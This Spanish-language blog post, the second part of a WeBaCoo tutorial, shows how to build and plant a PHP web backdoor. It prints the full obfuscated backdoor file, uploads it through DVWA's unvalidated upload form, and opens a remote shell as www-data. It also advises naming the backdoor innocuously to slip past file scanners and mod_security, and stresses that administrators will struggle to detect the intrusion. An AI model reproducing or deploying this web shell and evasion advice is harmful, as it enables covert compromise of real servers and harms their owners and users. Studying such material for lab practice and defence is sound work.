17 de diciembre de 2013

Como crear un Backdoor con WeBaCoo (2 de 2)


Segunda y última parte de esta entrega, y la idea de hoy es en primer lugar crear nuestro backdoor con WeBaCoo y lograr comprometer un servidor, para evitar meternos en problemas vamos a utilizar DVWA y en particular su fallo en el menu de Upload.

Para evitar llamar la atención en los escaneadores de archivos e incluso en el mismo mod_security, les recomiendo que utilicen un nombre para su backdoor que no haga alusión a que es un backdoor sino un archivo más.

$ ./webacoo.pl -g -f 1 -o consulta.php

        WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
        Copyright (C) 2011-2012 Anestis Bechtsoudis
        { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

[+] Backdoor file "consulta.php" created.

Por defecto el código queda ofuscado, pero tenemos la opción con -r de no ofuscarlo al momento de generarlo.

$ cat consulta.php
<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>


Es necesario subir nuestro backdoor hacia el servidor remoto para poder ejecutar nuestro ataque y para ello nos tenemos que fiar y explotar previamente fallos como RFI, XSS o SQL Inyection.


Utilizando dvwa, vamos adirigirnos hacia el menú Upload, basta con leer el código fuente y saber que desde este punto vamos a ser capaces de subir cualquier tipo de archivo, ya que prácticamente no se encuentra ningún tipo de validación


La opción Upload nos pide que seleccionemos una imágen para subir al servidor sin embarga vamos a poder subir nuestro backdoor sin problemas.


../../hackable/uploads/consulta.php succesfully uploaded!

Con esto solo nos queda ir nuevamente a la consola, donde se encuentra WeBaCoo y conectarnos con una terminal de forma remota. Como? De la siguientemanera

$ ./webacoo.pl -t -u http://servidor/remoto/path/backdoor.php

Para nuestro ejemplo que utilizamos DVWA y haciendo uso de un archivo log nos quedaría

$ ./webacoo.pl -t -u http://127.0.0.1/dvwa/hackable/uploads/consulta.php -l consulta.log
[+] Connecting to remote server as...
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Type 'load' to use an extension module.
[*] Type ':<cmd>' to run local OS commands.
[*] Type 'exit' to quit terminal.

webacoo$ 

Una vez ejecutado WeBaCoo podemos extender nuestro ataque, ejecutando nuevos módulos como el me MySQL, PostgreSQL, Upload, Download, etc.

webacoo$ pwd
/var/www/dvwa/hackable/uploads

De esta forma vamos a poder ejecutar varios comandos como ls, ps, cp, mv, cat y varios mas.

Con lo cuál esta es una de las formas de consolidar nuestro ataque, con WeBaCoo es muy difícil para el administrador del servidor remoto darse cuenta que lo están atacando.

Bueno, hasta aquí llegamos con esta serie de entregas, ojalá que la hayan disfrutado, pongan en práctica y espero todas sus dudas y consultas en los comentarios.

Saludos!

Enlace | Como crear un backdoor con WeBaCoo (1 de 2)

No hay comentarios.:

Publicar un comentario

Entradas populares